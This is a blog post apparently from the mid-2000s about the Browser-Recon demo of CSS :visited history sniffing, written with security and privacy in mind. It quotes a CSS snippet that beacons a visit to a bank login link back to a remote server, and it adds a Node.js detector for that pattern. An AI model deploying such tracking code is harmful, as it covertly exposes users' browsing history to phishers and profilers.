The Scariest Website I Know
For years, about the only bookmarks in my browser that I think would count as ’scary’ would have been the links for Bonsai Kittens and anything Evil Dead related. But a while back a new one was added to the list and I find I can’t keep myself from going back to it every few weeks. It seemed appropriate to bring it up again in light of some of the Blackhat talks. While it has a pretty innocuous name, the page never fails to make my jaw drop and my heart start pounding louder. If you think you are strong enough, and have a clean pair of underwear within reach, surf over to http://www.browser-recon.info
For those of you with weak bladders, let me quickly explain what the site does. Their page contains code that checks a number of popular sites to determine which of them you have visited in the past, then dynamically shows you a graphic based on those results. No clicking on a security pop-up required. No strange browser configuration needed. Just some clever CSS checking that basically works like a human looking at a list of links to see which ones are blue (never visited) and which ones are purple (visited). While the thought of this keeps me up at night, I’m sure this has got to be the wet dream of numerous spammers and phishers. Talk about targeted marketing. Think anyone has figured out a way to data mine these results and done some crazy profiling?
And for that scary “not quite dead yet” moment: while disabling JavaScript prevents the Browser-Recon site demo from showing your bank logo, disabling JavaScript alone is not enough to solve this issue. Jeremiah Grossman was nice enough to demonstrate at Blackhat both a JavaScript and a non-JavaScript version. The non-JavaScript version simply uses CSS and has the browser try to load a few well-crafted background images for any links it recognizes as visited. Here’s a little of the code. Notice the link tag without any text to click on.
<!-- Code snippet from Browser Recon.-->
<!-- CSS tags that will send a message back to our webserver of where you've been -->
<style type="text/css">
#n1004:visited { background: url(https://www.indiana.edu/~phishing/browser-recon/?url=1004&session=bc66632d49ca); }
</style>
<!-- A link with no text. We can check that for the "visited" property in CSS above -->
<a id="n1004" href="https://ibank.amsouth.com/auth/EnrollOverview.aspx"></a>
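As an added example (not code from the original post or the Browser-Recon site), here is a small Node.js check that flags the pattern shown above in page source: a :visited rule whose background fetches a remote URL, paired with an anchor carrying the same id. The domains, session value and hrefs in the sample are constructed placeholders, and the matching is regex-based rather than a full HTML/CSS parser.

```javascript
// Constructed sample page modelled on the snippet above (domains and session are made up).
const SAMPLE_HTML = `
<style type="text/css">
#n1004:visited { background: url(https://beacon.example/recon/?url=1004&session=PLACEHOLDER); }
#n1005:visited { color: purple; }
</style>
<a id="n1004" href="https://bank.example/login"></a>
<a id="n1005" href="https://shop.example/">Shop</a>
`;

// Find "#id:visited { ... }" rules whose declarations fetch a remote resource.
// A plain colour change on :visited (like #n1005) is normal styling and is not flagged.
function findVisitedBeacons(html) {
  const beacons = [];
  const ruleRe = /#([\w-]+):visited\s*\{([^}]*)\}/gi;
  let m;
  while ((m = ruleRe.exec(html)) !== null) {
    const [, id, body] = m;
    const urlMatch = /url\(\s*['"]?(https?:\/\/[^'")\s]+)/i.exec(body);
    if (urlMatch) beacons.push({ id, beaconUrl: urlMatch[1] });
  }
  return beacons;
}

// Map anchor ids to their href and whether the anchor has any visible text.
// Assumes the id attribute precedes href, as in the snippet above.
function findAnchors(html) {
  const anchors = {};
  const aRe = /<a\s+[^>]*id=["']([\w-]+)["'][^>]*href=["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = aRe.exec(html)) !== null) {
    anchors[m[1]] = { href: m[2], empty: m[3].trim() === '' };
  }
  return anchors;
}

// Join beacons to anchors: each probed href with the URL that would report a visit,
// plus whether the link is hidden (no text), which is the tell-tale sign of sniffing.
function detectHistorySniffing(html) {
  const anchors = findAnchors(html);
  return findVisitedBeacons(html)
    .filter((b) => anchors[b.id])
    .map((b) => ({
      probedHref: anchors[b.id].href,
      beaconUrl: b.beaconUrl,
      hiddenLink: anchors[b.id].empty,
    }));
}

console.log(detectHistorySniffing(SAMPLE_HTML));
```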
Now I can sleep a little better knowing there’s a Firefox plug-in to block this, but look at when it was originally published: November 20, 2005. That’s quite a bit of time, and this behaviour is still not patched? I’ve seen a lot of people grumbling over the state of security in web browsers recently (DNS pinning being the latest pain point). With my NoScript, SafeHistory, uninstalled Java, disabled autocomplete version of Firefox running in a VM… I can’t say I disagree.
-b3nn